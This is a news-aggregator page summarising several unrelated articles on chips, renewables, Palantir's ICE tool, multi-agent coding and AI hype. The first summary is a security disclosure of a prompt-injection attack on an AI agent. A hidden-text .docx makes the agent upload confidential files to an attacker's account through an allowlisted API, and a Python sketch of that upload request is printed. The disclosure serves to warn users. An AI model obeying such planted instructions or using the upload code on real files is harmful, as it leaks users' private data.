10 interesting stories served every morning and every evening.
Two days ago, Anthropic released the Claude Cowork research preview (a general-purpose AI agent to help anyone with their day-to-day work). In this article, we demonstrate how attackers can exfiltrate user files from Cowork by exploiting an unremediated vulnerability in Claude’s coding environment, which now extends to Cowork. The vulnerability was first identified by Johann Rehberger in Claude.ai chat, before Cowork existed; he disclosed it to Anthropic, which acknowledged it but did not remediate it.
Anthropic warns users, “Cowork is a research preview with unique risks due to its agentic nature and internet access,” and recommends that they watch for “suspicious actions that may indicate prompt injection”. However, as this feature is intended for the general populace, not just technical users, we agree with Simon Willison’s take:
“I do not think it is fair to tell regular non-programmer users to watch out for ‘suspicious actions that may indicate prompt injection’!”
As Anthropic has acknowledged this risk and put it on users to “avoid granting access to local files with sensitive information” (while simultaneously encouraging the use of Cowork to organize your Desktop), we have chosen to publicly disclose this demonstration of a threat users should be aware of. By raising awareness, we hope to enable users to better identify the types of ‘suspicious actions’ mentioned in Anthropic’s warning.
This attack leverages the allowlisting of the Anthropic API to achieve data egress from Claude’s VM environment (which restricts most network access).
The victim connects Cowork to a local folder containing confidential real estate files
The victim uploads a file to Claude that contains a hidden prompt injection
For general use cases, this is quite common; a user finds a file online and uploads it to Claude. The attack does not depend on this particular injection source - others include, but are not limited to, web data from Claude for Chrome, connected MCP servers, etc. In this case, the injected file is a Claude ‘Skill’ (although, as mentioned, it could also just be a regular document), as Skills are a generalizable file convention that users are likely to encounter, especially when using Claude.
Note: If you are familiar with Skills, they are canonically Markdown files (which users often do not heavily scrutinize). However, we demonstrate something more interesting: here, the user uploads a .docx (such as may be shared on an online forum), which poses as a Skill - the contents appear to be Markdown that was just saved after editing in Word. In reality, this trick allows attackers to conceal the injection using 1-point font, white-on-white text, and with line spacing set to 0.1 — making it effectively impossible to detect.
The victim asks Cowork to analyze their files using the Real Estate ‘skill’ they uploaded
The injection manipulates Cowork to upload files to the attacker’s Anthropic account
The injection tells Claude to use a ‘curl’ command to make a request to the Anthropic file upload API with the largest available file. The injection then provides the attacker’s API key, so the file will be uploaded to the attacker’s account.
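To make the egress step concrete, below is a rough sketch of what such an upload request could look like. The article only describes a curl command that Claude runs inside the VM; this Python equivalent, the file path, and the placeholder API key are our own assumptions for illustration, not the exact payload from the demo.

```python
# Hypothetical illustration of the exfiltration step described above.
# Assumes the public Anthropic Files API endpoint; the attacker's key and the
# target file path are placeholders, not values from the actual demo.
import requests

ATTACKER_API_KEY = "sk-ant-...attacker-key..."  # attacker-controlled account

def upload_to_attacker_account(path: str) -> None:
    """Upload a local file to the attacker's Anthropic account via the Files API."""
    with open(path, "rb") as f:
        resp = requests.post(
            "https://api.anthropic.com/v1/files",
            headers={
                "x-api-key": ATTACKER_API_KEY,
                "anthropic-version": "2023-06-01",
                "anthropic-beta": "files-api-2025-04-14",
            },
            files={"file": f},
        )
    resp.raise_for_status()
    print(resp.json())  # the file now lives in the attacker's account

# upload_to_attacker_account("confidential_real_estate_financials.xlsx")  # placeholder path
```

Because api.anthropic.com is allowlisted inside the VM, a request like this succeeds where calls to an arbitrary attacker domain would be blocked.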
At no point in this process is human approval required. If we expand the ‘Running command’ block, we can see the malicious request in detail. Code executed by Claude is run in a VM - restricting outbound network requests to almost all domains - but the Anthropic API flies under the radar as trusted, allowing this attack to complete successfully.
The attacker’s account contains the victim’s file, allowing them to chat with it
The exfiltrated file contains financial figures and PII, including partial SSNs.
The above exploit was demonstrated against Claude Haiku. Although Claude Opus 4.5 is known to be more resilient to injections, Opus 4.5 in Cowork was also successfully manipulated via indirect prompt injection to exploit the same file upload vulnerability and exfiltrate data, in a test where the ‘user’ uploaded a malicious integration guide while developing a new AI tool.
As the focus of this article was more for everyday users (and not developers), we opted to demonstrate the above attack chain instead of this one.
An interesting finding: Claude’s API struggles when a file does not match the type it claims to be. When operating on a malformed PDF (a file that ends in .pdf but is really a text file with a few sentences in it), after trying to read it once, Claude starts throwing an API error on every subsequent turn of the conversation.
We posit that it is likely possible to exploit this failure via indirect prompt injection to cause a limited denial of service attack (e.g., an injection can elicit Claude to create a malformed file, and then read it). Uploading the malformed file via the files API resulted in notifications with an error message, both in the Claude client and the Anthropic Console.
One of the key capabilities that Cowork was created for is the ability to interact with one’s entire day-to-day work environment. This includes the browser and MCP servers, granting capabilities like sending texts, controlling one’s Mac with AppleScripts, etc.
These functionalities make it increasingly likely that the model will process both sensitive and untrusted data sources (which the user does not review manually for injections), making prompt injection an ever-growing attack surface. We urge users to exercise caution when configuring Connectors. Though this article demonstrated an exploit without leveraging Connectors, we believe they represent a major risk surface likely to impact everyday users.
...
Read the original on www.promptarmor.com »
The URL shortener that makes your links look as suspicious as possible.
Normal links are too trustworthy. Make them creepy.
...
Read the original on creepylink.com »
Palantir is working on a tool for Immigration and Customs Enforcement (ICE) that populates a map with potential deportation targets, brings up a dossier on each person, and provides a “confidence score” on the person’s current address, 404 Media has learned. ICE is using it to find locations where lots of people it might detain could be based.
The findings, based on internal ICE material obtained by 404 Media, public procurement records, and recent sworn testimony from an ICE official, show the clearest link yet between the technological infrastructure Palantir is building for ICE and the agency’s activities on the ground. The tool receives people’s addresses from the Department of Health and Human Services (HHS) among a range of other sources, according to the material.
The news comes after Department of Homeland Security (DHS) head Kristi Noem said the agency is sending hundreds more federal agents to Minneapolis amid widespread protests against the agency. Last week, ICE officer Jonathan Ross shot and killed 37-year-old U.S. citizen Renee Nicole Good. During Operation Metro Surge, which DHS calls the “largest immigration operation ever,” immigration agents have surrounded rideshare drivers and used pepper spray on high school students.
...
Read the original on www.404media.co »
When CC Wei visited Cupertino last August, he had bad news for his largest client. Apple would need to acquiesce to the largest price rise in years, TSMC’s CEO told its executives.
Tim Cook and his team took the news on the chin. Wei had been telegraphing hikes in earnings calls over the past few quarters, and the Taiwanese chip maker’s rising gross margins were testament to its increasing pricing power.
That wasn’t the worst news, my sources tell me.
Apple, which once held a dominant position on TSMC’s customer list, now needs to fight for production capacity. With the continuing AI boom, and each GPU from clients like Nvidia and AMD taking up a larger footprint per wafer, the iPhone maker’s chip designs are no longer guaranteed a place among TSMC’s almost two dozen fabs.
What Wei probably didn’t tell Cook is that Apple may no longer be his largest client.
According to Culpium analysis and discussions with sources in the supply chain, Nvidia likely took top spot in at least one or two quarters of last year. “We don’t discuss that,” Chief Financial Officer Wendell Huang told Culpium Thursday when asked about the change in client rankings.
Final data will be unveiled in a few months when TSMC releases its annual report — which includes revenue from its top clients — but there’s every chance that Apple’s lead for the full year narrowed significantly and may have even fallen below Nvidia’s. If it didn’t happen in 2025, then it’s almost certain to do so in 2026, my sources tell me.
TSMC’s revenue climbed 36% last year to $122 billion, it reported Thursday. Nvidia’s sales for the fiscal year through January 2026 are set to climb 62%, while Apple’s product revenue — which excludes services — is on track to grow just 3.6% for the 12 months to December 2025, according to Culpium estimates based on earnings reports and company guidance.
Apple’s role as the primary driver of TSMC revenue growth ended five years ago. In 2018 TSMC sales would have even fallen if not for incremental purchases by Apple that year. Now, the Cupertino company is posting low single-digit revenue growth while Nvidia is skyrocketing.
The reason for this change is two-fold, and pretty obvious: AI is driving massive demand for high-powered chips, while the smartphone boom has plateaued.
TSMC’s sales from high-performance computing, which includes AI chips, climbed 48% last year on top of 58% growth the year before. Smartphone revenue climbed just 11%, slower than 23% in the prior year. That trend will continue this year, and for the foreseeable future.
Revenue in 2026 will rise close to 30%, yet capital expenditure will climb around 32% to a record of somewhere between $52 billion and $56 billion, TSMC said Thursday. Longer term, growth will average 25% in the five years through 2029 yet the AI segment will climb an average of 55% or more over the same period, the company said. That’s higher than a prior forecast for a mid-40 percent figure.
The ultimate flex for TSMC came Thursday when it showed off not only record revenue and net income, but a gross margin approaching that of software makers and fabless chip designers. In the December quarter, that figure was an astounding 62.3%, 280 basis points higher than the prior period. If not for its overseas fabs (Arizona and Japan) gross margin would have been even higher.
There are two caveats that are important. First, while smartphone processors are the largest portion of chips bought by Apple, they’re not the only type. Processors for Macs come under HPC, while it also has a strong lineup of custom chips used in accessories which fall under digital consumer electronics. Second, Nvidia isn’t the only HPC client. AMD is a major buyer of capacity for its own GPUs while Amazon and Google are on the growing list of customers developing in-house AI chips.
Put another way, Apple’s chip catalog is broader and more varied, while Nvidia’s lineup is more concentrated around a huge number of wafers at, or near, leading-edge. It’s for these reasons that Apple will remain important for at least another decade.
In the near-term, however, TSMC’s technology roadmap coupled with broader industry trends favor Nvidia, AMD and their ilk, meaning Apple may need to keep fighting for capacity over the next year or two.
TSMC is already producing chips in volume at 2 nanometer (called N2), currently its most advanced node, with Apple a major buyer. But in the second half of this year it’s set to ramp up both a new variant called N2P as well as a new node called A16.
The company’s business model is a little quirky. Instead of repurposing an existing factory for new technology, TSMC just builds a new one. This ensures no interruption to output and allows it to squeeze the most out of old tools and processes. In general, this means any new capacity that TSMC builds is for a new node. As a result, it has numerous fabs still churning out chips on technology that’s a decade older or more.
In TSMC CEO CC Wei’s words, A16, with Super Power Rail, is “best for HPC with complex signal routes.” SPR is TSMC’s version of backside power, a newer approach designed to separate a chip’s signal from its power supply. Intel is also developing this technology, and many believe it will be the key to the US company’s prospects of stealing foundry share from its Taiwanese rival.
After that, TSMC has A14 which it expects to bring into volume production around 2028. Some call this the next full node after N2, labeling A16 as not a “full node.” In truth, all of these names are as much marketing terms as they are technology designators. Nevertheless, as SemiAnalysis recently wrote in a fabulous report on the TSMC-Apple relationship, the balance will shift back to Apple because A14 is designed “for both mobile and HPC from the start.”
More importantly, what Apple offers is stability. Nvidia has been a client for a lot longer than Apple, but broadly speaking it’s a bit niche. Right now that “niche” is the hottest product on the planet, but niche it is. Apple, on the other hand, has products being made in no fewer than a dozen TSMC fabs. Even if Nvidia did overtake Apple by purchases, the breadth of its manufacturing footprint at TSMC is nowhere near as large.
This distinction may not matter now, but it probably will at some point. The AI boom won’t last forever. The bubble may burst, or it may slowly deflate, but the growth trajectory will surely flatten and that means demand for leading-edge AI chips will fall.
Wei knows this, which is why he’s expanding both quickly yet cautiously. “I am also very nervous,” he said at the company’s investor conference on Thursday in Taipei. “If we didn’t do it carefully, it would be a big disaster for TSMC for sure.”
The chip giant has recently come under fire, including from noted analyst Benedict Evans, for being “unwilling/unable to expand capacity fast enough to meet Nvidia’s book.” I think this is wrong, and unfair.
“The risk of under-investing is significantly greater than the risk of over-investing,” Evans cited Google CEO Sundar Pichai as saying back in 2Q 2024, as if to make the point. TSMC and Alphabet, Google’s parent, have approximately the same gross margin. But their business models couldn’t be more different. Nvidia’s financials are also unlike TSMC’s. Their respective capex strategies need to reflect this risk.
Alphabet’s capital intensity, calculated as acquisitions of property, plant & equipment divided by revenue, was just 15% for full-year 2024. TSMC’s is more than double that at over 33%. More importantly, depreciation — which is where the cost of capex is reflected in earnings — was just 10% of Alphabet’s cost of revenue. For TSMC, this figure is more than four times higher at 45%.
At Nvidia, which is a tier-one buyer of TSMC’s output, the data is starker. Capital intensity was just 2.5% for 2024, while depreciation was only 5.7% of the cost of revenue. As a fabless chipmaker, it can enjoy gross margins of over 70%. Its only real risk is holding excess inventory. Even then, it could have written off its entire inventory at the end of October and still maintained a gross margin approaching that of its chief supplier. What’s more, neither of these clients has anywhere near the customer-concentration risk of TSMC.
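For readers who want to reproduce the comparison, here is a small back-of-envelope sketch of the two ratios used above. The formulas follow the definitions in the text; the numbers plugged in are illustrative placeholders, not figures taken from the companies’ filings.

```python
# Back-of-envelope sketch of the two ratios discussed above.
# Definitions follow the article; the example inputs are illustrative
# placeholders, not values from the companies' actual filings.

def capital_intensity(capex: float, revenue: float) -> float:
    """Acquisitions of property, plant & equipment divided by revenue."""
    return capex / revenue

def depreciation_share(depreciation: float, cost_of_revenue: float) -> float:
    """Depreciation as a share of cost of revenue (where capex flows into earnings)."""
    return depreciation / cost_of_revenue

# Per the article (full-year 2024): Alphabet ~15% capital intensity vs. TSMC >33%;
# depreciation ~10% of Alphabet's cost of revenue vs. ~45% for TSMC;
# Nvidia: ~2.5% capital intensity and ~5.7% depreciation share.
print(capital_intensity(capex=52.5, revenue=350.0))   # ~0.15, an Alphabet-like profile
print(capital_intensity(capex=30.0, revenue=90.0))    # ~0.33, a TSMC-like profile
```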
The complaint that TSMC could and should build faster ignores the fact that it’s the one left holding the baby if a downturn comes and demand falls. It takes two to three years to build a new fab, Wei explained, so the company must skate where the puck is going without thinking too much about where it’s been. “Even if we spend 52 to 56 billion this year, the contribution this year is none,” Wei said Thursday. Its major cost, buying equipment, remains on the books no matter what revenue it brings in for the quarter.
For the best part of a decade, Apple was the one driving TSMC’s need to keep spending on new facilities. Today it’s Nvidia, and Jensen Huang is starting to wield more power than Tim Cook. But neither has to bother with the expensive business of actually manufacturing semiconductors, merely the hassle of begging CC Wei for wafers.
For such clients, the foundry’s capacity is a fixed cost that they needn’t worry about. Which is precisely why eight of the world’s ten largest companies turn to TSMC to make their chips, and in return the Taiwanese giant gets to reap the rewards during boom times like this.
...
Read the original on www.culpium.com »
Last year China installed more than half of all wind and solar added globally. In May alone, it added enough renewable energy to power Poland, installing solar panels at a rate of roughly 100 every second.
The massive buildout is happening across the country, from crowded eastern cities increasingly topped by rooftop solar panels to remote western deserts where colossal wind farms sprawl across the landscape.
“From the ground, it’s hard to grasp the scale of these power plants,” said Chinese photographer Weimin Chu. “But when you rise into the air, you can see the geometry, the rhythm — and their relationship with the mountains, the desert, the sea.”
Chu has spent three years capturing the shift underway using drones to photograph power plants from overhead. His work, which draws from the visual language of traditional Chinese ink paintings, was featured last year in an award-winning exhibition, presented by Greenpeace. A selection of those photos is reproduced here.
“I started out just shooting landscapes,” Chu said. “But when I traveled to places like Guizhou, Yunnan, and Qinghai in 2022, I kept seeing wind farms and solar power plants appear in my camera frame. I realized this is the story of our time — and almost no one is documenting it in a systematic way.”
...
Read the original on e360.yale.edu »
Yes, you, who are thinking about not hiring a technical writer this year or, worse, erased one or more technical writing positions last year because of AI. You, who are buying into the promise of docs entirely authored by LLMs without expert oversight or guidance. You, who unloaded the weight of docs on your devs’ shoulders, as if it was a trivial chore.
You are making a big mistake. But you can still undo the damage.
It’s been a complicated year, 2025. When even Andrej Karpathy, one of OpenAI’s founders, admits, in a fit of Oppenheimerian guilt, to feeling lost, you know that no one holds the key to the future. You flail and dance around these new totems made of words, which are neither intelligent nor conscious, pretending they can replace humans while, in fact, they’re little more than glorified tools.
You might think that the plausible taste of AI prose is all you need to give your products a voice. You paste code into a field and something that resembles docs comes out after a few minutes. Like a student eager to turn homework in, you might be tempted to content yourself with docs theatre, thinking that it’ll earn you a good grade. It won’t, because docs aren’t just artifacts.
You keep using that word. I do not think it means what you think it means
When you say “docs”, you’re careful to focus on the output, omitting the process. Perhaps you don’t know how docs are produced. You’ve forgotten, or perhaps never knew, that docs are product truth; that without them, software becomes unusable, because software is never done, is never obvious, and is never simple. Producing those docs requires tech writers.
Tech writers go to great lengths to get the information they need. They write so that your audience can understand. They hunger for clarity and meaning and impact. They power through weeks full of deadlines, chasing product news, because without their reporting, most products wouldn’t thrive; some wouldn’t even exist. Their docs aren’t a byproduct: they tie the product together.
An LLM can’t do all that, because it can’t feel the pain of your users. It can’t put itself into their shoes. It lacks the kind of empathy that’s behind great help content. It does not, in fact, have any empathy at all, because it cannot care. You need folks who will care, because content is a hairy beast that can only be tamed by agents made of flesh and capable of emotions: humans.
You can’t generate docs on autopilot. Let me tell you why.
First, AI-generated docs are not intelligent. They not only make up things in subtle ways: They lack vision. Even if you fed them millions of tokens, they couldn’t develop a docs strategy, decide what not to document, or structure content for reuse. And they fail to capture the tension, the caveats, the edge cases, the feeling of unfinishedness that only someone who cares can feel. Without that grounding, docs are hollow.
Second, liability doesn’t vanish just because AI wrote it. When docs cause harm through wrong instructions, someone will be held responsible. It won’t be the model. You can’t depose an LLM. You can’t fire it. You can’t point at it in court when a customer’s data evaporates because your GenAI runbook told them to run the wrong command. That someone will be you, or someone who reports to you.
Third, even your favorite AI must RTFM. All your Claude Skills, Cursor rules, all the semantic tagging that makes RAG work, is technical writing under a new name: context curation. You fired or didn’t hire the people who create high-quality context and then wondered why your AI tools produce slop. You can’t augment what isn’t there. The writers you let go were the supply chain for the intelligence you’re now betting on.
It’s not all bad news: Marvelous things can happen if you provide your writers with AI tools and training while you protect the quality of your content through an AI policy. I’ve described the ideal end state in My day as an augmented technical writer in 2030, a vision of the future where writers orchestrate, edit, and publish docs together with AI agents. This is already happening before our eyes.
Productivity gains are real when you understand that augmentation is better than replacing humans, a reality even AWS’ CEO, Matt Garman, acknowledged. Read how I’m using AI as a technical writer. I’m not alone: Follow Tom Johnson, CT Smith, and Sarah Deaton, and discover how tech writers are building tools through AI to better apply it to docs.
Develop an AI strategy for docs together with tech writers, and give them time and resources to experiment with AI. Tech writers are resourceful by nature: they’ve spent careers doing more with less, optimizing workflows, finding clever solutions to impossible quests. Give them the tools and a bit of runway, and they’ll figure out how to make AI work for the docs, not instead of them.
Reconsider the positions you did not open. Or the writers you let go. Reconsider the assumption that AI has solved a problem that, at its core, is deeply human and requires not only concatenating words, but also chasing subject-matter experts and understanding the subtleties of product motions, among many other things.
Technical writers aren’t a luxury. They are the people who translate what you’ve built into something others can use. Without them, you’re shipping a product that can’t speak for itself, or that lies. Your product needs to speak. AI can generate noise effectively and infinitely, but only a technical writer can create the signal.
Don’t choose the noise. Get them back. Get them onboard.
Thanks to Tiffany Hrabusa, Casey Smith, and Anna Urbiztondo for their reviews of early drafts and for their encouragement. Thanks to my partner, Valentina, for helping me improve this piece and for suggesting to wait a bit before hitting Publish. And a heartfelt thank you to the tech writing community and its wonderful human beings.
For a standalone version of this letter, use https://passo.uno/reconsider/.
...
Read the original on passo.uno »
We’ve been experimenting with running coding agents autonomously for weeks.
Our goal is to understand how far we can push the frontier of agentic coding for projects that typically take human teams months to complete.
This post describes what we’ve learned from running hundreds of concurrent agents on a single project, coordinating their work, and watching them write over a million lines of code and trillions of tokens.
Today’s agents work well for focused tasks, but are slow for complex projects. The natural next step is to run multiple agents in parallel, but figuring out how to coordinate them is challenging.
Our first instinct was that planning ahead would be too rigid. The path through a large project is ambiguous, and the right division of work isn’t obvious at the start. We began with dynamic coordination, where agents decide what to do based on what others are currently doing.
Our initial approach gave agents equal status and let them self-coordinate through a shared file. Each agent would check what others were doing, claim a task, and update its status. To prevent two agents from grabbing the same task, we used a locking mechanism.
Agents would hold locks for too long, or forget to release them entirely. Even when locking worked correctly, it became a bottleneck. Twenty agents would slow down to the effective throughput of two or three, with most time spent waiting.
The system was brittle: agents could fail while holding locks, try to acquire locks they already held, or update the coordination file without acquiring the lock at all.
We tried replacing locks with optimistic concurrency control. Agents could read state freely, but writes would fail if the state had changed since they last read it. This was simpler and more robust, but there were still deeper problems.
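To illustrate the idea, here is a minimal sketch of optimistic concurrency control over a shared coordination file. The JSON layout, field names, and retry policy are assumptions for illustration, not Cursor’s actual implementation.

```python
# Minimal sketch: optimistic concurrency control over a shared coordination file.
# The schema (a "version" counter plus a task map) is an assumption for
# illustration; it is not the format Cursor's agents actually use.
import json, os, tempfile

STATE_PATH = "coordination.json"  # hypothetical shared state file

def read_state(path: str = STATE_PATH) -> dict:
    with open(path) as f:
        return json.load(f)

def try_commit(expected_version: int, new_state: dict, path: str = STATE_PATH) -> bool:
    """Write new_state only if nobody else has bumped the version since we read it."""
    current = read_state(path)
    if current["version"] != expected_version:
        return False  # someone else wrote first; caller re-reads and retries
    new_state["version"] = expected_version + 1
    # Write atomically so readers never see a half-written file.
    fd, tmp = tempfile.mkstemp(dir=os.path.dirname(os.path.abspath(path)))
    with os.fdopen(fd, "w") as f:
        json.dump(new_state, f)
    os.replace(tmp, path)
    return True

def claim_task(agent_id: str, task_id: str) -> bool:
    """An agent claims a task; on a version conflict it gives up and retries later."""
    state = read_state()
    if state["tasks"][task_id]["owner"] is not None:
        return False  # already claimed by another agent
    state["tasks"][task_id]["owner"] = agent_id
    return try_commit(state["version"], state)
```

Note that the version check and the final write in this sketch are not themselves atomic; a real implementation would need a compare-and-swap primitive (a database row, a conditional write, etc.), but the read-validate-retry shape is the same.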
With no hierarchy, agents became risk-averse. They avoided difficult tasks and made small, safe changes instead. No agent took responsibility for hard problems or end-to-end implementation. This led to work churning for long periods without progress.
Our next approach was to separate roles. Instead of a flat structure where every agent does everything, we created a pipeline with distinct responsibilities.
Planners continuously explore the codebase and create tasks. They can spawn sub-planners for specific areas, making planning itself parallel and recursive.
Workers pick up tasks and focus entirely on completing them. They don’t coordinate with other workers or worry about the big picture. They just grind on their assigned task until it’s done, then push their changes.
At the end of each cycle, a judge agent determined whether to continue, then the next iteration would start fresh. This solved most of our coordination problems and let us scale to very large projects without any single agent getting tunnel vision.
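Schematically, the pipeline described above might be organized like the sketch below. The task queue, callbacks, and stopping criterion are our assumptions, not the actual harness; in the real system hundreds of workers drain the queue concurrently rather than in a sequential loop.

```python
# Schematic sketch of the planner / worker / judge pipeline described above.
# Everything here is an illustrative assumption, not Cursor's actual harness.
from dataclasses import dataclass
from queue import Queue

@dataclass
class Task:
    description: str
    done: bool = False

def run_cycle(goal: str, plan, work, judge) -> bool:
    """One iteration: planners fill the queue, workers drain it, a judge decides whether to continue."""
    tasks: Queue = Queue()

    # Planners explore the codebase and emit tasks (possibly via sub-planners).
    for description in plan(goal):
        tasks.put(Task(description))

    # Workers grind on their assigned task until done, then push their changes.
    while not tasks.empty():
        task = tasks.get()
        work(task)          # each call stands in for one worker agent's run
        task.done = True

    # A judge reviews the state of the project and decides whether the next
    # iteration should start fresh (combating drift and tunnel vision).
    return judge(goal)
```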
To test this system, we pointed it at an ambitious goal: building a web browser from scratch. The agents ran for close to a week, writing over 1 million lines of code across 1,000 files. You can explore the source code on GitHub.
Despite the codebase size, new agents can still understand it and make meaningful progress. Hundreds of workers run concurrently, pushing to the same branch with minimal conflicts.
While it might seem like a simple screenshot, building a browser from scratch is extremely difficult.
Another experiment was an in-place migration from Solid to React in the Cursor codebase. It took over 3 weeks, with +266K/-193K edits. As we’ve started testing the changes, we believe it’s possible to merge them.
Another experiment was to improve an upcoming product. A long-running agent made video rendering 25x faster with an efficient Rust version. It also added support to zoom and pan smoothly with natural spring transitions and motion blurs, following the cursor. This code was merged and will be in production soon.
We have a few other interesting examples still running:
We’ve deployed billions of tokens across these agents toward a single goal. The system isn’t perfectly efficient, but it’s far more effective than we expected.
Model choice matters for extremely long-running tasks. We found that GPT-5.2 models are much better at extended autonomous work: following instructions, keeping focus, avoiding drift, and implementing things precisely and completely.
Opus 4.5 tends to stop earlier and take shortcuts when convenient, yielding back control quickly. We also found that different models excel at different roles. GPT-5.2 is a better planner than GPT-5.1-codex, even though the latter is trained specifically for coding. We now use the model best suited for each role rather than one universal model.
Many of our improvements came from removing complexity rather than adding it. We initially built an integrator role for quality control and conflict resolution, but found it created more bottlenecks than it solved. Workers were already capable of handling conflicts themselves.
The best system is often simpler than you’d expect. We initially tried to model systems from distributed computing and organizational design. However, not all of them work for agents.
The right amount of structure is somewhere in the middle. Too little structure and agents conflict, duplicate work, and drift. Too much structure creates fragility.
A surprising amount of the system’s behavior comes down to how we prompt the agents. Getting them to coordinate well, avoid pathological behaviors, and maintain focus over long periods required extensive experimentation. The harness and models matter, but the prompts matter more.
Multi-agent coordination remains a hard problem. Our current system works, but we’re nowhere near optimal. Planners should wake up when their tasks complete to plan the next step. Agents occasionally run for far too long. We still need periodic fresh starts to combat drift and tunnel vision.
But the core question, can we scale autonomous coding by throwing more agents at a problem, has a more optimistic answer than we expected. Hundreds of agents can work together on a single codebase for weeks, making real progress on ambitious projects.
The techniques we’re developing here will eventually inform Cursor’s agent capabilities. If you’re interested in working on the hardest problems in AI-assisted software development, we’d love to hear from you at hiring@cursor.com.
...
Read the original on cursor.com »
Last week, the developer community was busy discussing a single tweet:
I’m not joking and this isn’t funny. We have been trying to build distributed agent orchestrators at Google since last year. There are various options, not everyone is aligned… I gave Claude Code a description of the problem, it generated what we built last year in an hour.— Jaana Dogan ヤナ ドガン (@rakyll) January 2, 2026
The author is Jaana Dogan (known as Rakyll), a highly respected figure in the Google ecosystem, in the open-source world, and in my heart (thank you Rakyll for your great Go blog posts).
At first glance, the tweet suggests an enormous shift in the software industry: the ability to build in just one hour, from nothing but a description of the problem, what previously required weeks or months from a team of software engineers. The tweet was overly dramatic in my opinion, but actually impressive!
The post triggered an immediate wave of “doom-posting,” with many fearing for the future of software engineering (as each week since a year now). However, as the conversation reached a high number of replies and citations on social networks, Rakyll released a follow-up thread to provide context:
To cut through the noise on this topic, it’s helpful to provide more context:
- We have built several versions of this system last year.
- There are tradeoffs and there hasn’t been a clear winner.
- When prompted with the best ideas that survived, coding agents are able to… https://t.co/k5FvAah7yc— Jaana Dogan ヤナ ドガン (@rakyll) January 4, 2026
This response thread revealed a story far less miraculous than the original tweet suggested. Let’s analyze it.
Crucially, the foundational “thinking” had already been performed by Rakyll herself, who guided the AI using architectural concepts (honed over several weeks or months of prior effort) rather than the AI thinking and inventing the “product” from scratch.
Furthermore, the resulting project was strictly a proof-of-concept that falls far short of a production-ready system capable of managing real-world complexity.
And finally, this success hinged on Rakyll’s implicit domain knowledge and deep expertise. The last point is often (strategically?) omitted from these “magic” viral demonstrations in order to make the tool appear way more autonomous than it truly is.
Hmm. Now, this is far less exciting…
This pattern of “hype first and context later” is actually part of a growing trend.
I call the individuals participating in that trend “The Influentists”. These people are members of a scientific or technical community who leverage their large audiences to propagate claims that are, at best, unproven and, at worst, intentionally misleading.
But how can we spot them?
I personally identify these “Influentists” by four personality traits that characterize their public discourse.
The first is a reliance on “trust-me-bro” culture, where anecdotal experiences are framed as universal, objective truths to generate hype. This is a sentiment perfectly captured by the “I’m not joking and this isn’t funny” tone of Rakyll’s original tweet, but also the dramatic “I’ve never felt that much behind as a programmer” from Andrej Karpathy’s tweet. This is supported by an absence of reproducible proof, as these individuals rarely share the code, data, or methodology behind their viral “wins”, an omission made easier than ever in the current LLM era. And finally, they utilize strategic ambiguity, carefully wording their claims with enough vagueness to pivot toward a “clarification” if the technical community challenges their accuracy.
I’ve never felt this much behind as a programmer. The profession is being dramatically refactored as the bits contributed by the programmer are increasingly sparse and between. I have a sense that I could be 10X more powerful if I just properly string together what has become…— Andrej Karpathy (@karpathy) December 26, 2025
Rakyll is far from alone. We see this “hype-first” approach across major AI firms like Anthropic, OpenAI, or Microsoft.
Consider Galen Hunt, a Distinguished Engineer at Microsoft. He recently made waves by claiming a goal to rewrite Microsoft’s massive C/C++ codebases into Rust by 2030 using AI.
When the industry pointed out the near-impossible complexity of this task and asked for clarity about popular, critical products like Microsoft Windows, he was forced to clarify that it was only a “research project”.
Similarly, engineers from Anthropic and OpenAI often post teasers about “AGI being achieved internally”, only to release, months later, models that disappoint the crowd.
Wait, can we consider seriously the hypothesis that 1) the recent hyped tweets from OA’s staff
2) “AGI has been achieved internally”
3) sama’s comments on the qualification of slow or fast takeoff hinging on the date you count from
4) sama’s comments on 10000x researchers
are… https://t.co/f57g7dXMhM pic.twitter.com/Gap3V7VqkK— Siméon (@Simeon_Cps) September 24, 2023
Liam, I have been a professional programmer for 36 years. I spent 11 years at Google, where I ended up as a Staff Software Engineer, and now work at Anthropic. I’ve worked with some incredible people - you might have heard of Jaegeuk Kim or Ted Ts’o - and some ridiculously… https://t.co/Ku8agTrps3— Paul Crowley (@ciphergoth) December 31, 2025
Similarly, many other companies lie about what they are solving or intend to solve:
When leaders at major labs propagate these hype-based results, it can create a “technical debt of expectations” for the rest of us. Junior developers see these viral threads and feel they are failing because they can’t reproduce a year of work in an hour, not realizing the “magic” was actually a highly curated prototype guided by a decade of hidden expertise.
We must stop granting automatic authority to those who rely on hype, or vibes, rather than evidence.
If a tool or methodology were truly as revolutionary as claimed, then it wouldn’t need a viral thread to prove its worth because the results would speak for themselves.
The tech community must shift its admiration back toward reproducible results and away from this “trust-me-bro” culture.
...
Read the original on carette.xyz »
Today Raspberry Pi launched their new $130 AI HAT+ 2 which includes a Hailo 10H and 8 GB of LPDDR4X RAM.
With that, the Hailo 10H is capable of running LLMs entirely standalone, freeing the Pi’s CPU and system RAM for other tasks. The chip runs at a maximum of 3W, with 40 TOPS of INT8 NPU inference performance in addition to the equivalent 26 TOPS INT4 machine vision performance on the earlier AI HAT with Hailo 8.
In practice, it’s not as amazing as it sounds.
You still can’t upgrade the RAM on the Pi, but at least this way if you do have a need for an AI coprocessor, you don’t have to eat up the Pi’s memory to run things on it.
And it’s a lot cheaper and more compact than running an eGPU on a Pi. In that sense, it’s more useful than the silly NPUs Microsoft forces into their ‘AI PCs’.
But it’s still a solution in search of a problem, in all but the most niche of use cases.
Besides feeling like I’m living in the world of the Turbo Encabulator every time I’m testing AI hardware, I find the marketing of these things to be very vague, and the applications not very broad.
For example, the Hailo 10H is advertised as being used for a Fujitsu demo of automatic shrink detection for a self-checkout.
That’s certainly not a worthless use case, but it’s not something I’ve ever needed to do. I have a feeling this board is meant more for development, for people who want to deploy the 10H in other devices, rather than as a total solution to problems individual Pi owners need to solve.
Especially when it comes to the headline feature: running inference, like with LLMs.
I also published a video with all the information in this blog post, but if you enjoy text more than video, scroll on past—it doesn’t offend me!
I ran everything on an 8 gig Pi 5, so I could get an apples-to-apples comparison, running the same models on the Pi’s CPU as I did on the AI HAT’s NPU.
They both have the same 8GB LPDDR4X RAM configuration, so ideally, they’d have similar performance.
I tested every model Hailo put out so far, and compared them, Pi 5 versus Hailo 10H:
The Hailo is only close, really, on Qwen2.5 Coder 1.5B.
It is slightly more efficient in most cases:
But looking more closely at power draw, we can see why the Hailo doesn’t keep up:
The Pi’s CPU is allowed to max out its power limits (10W on the SoC), which are a lot higher than the Hailo’s (3W).
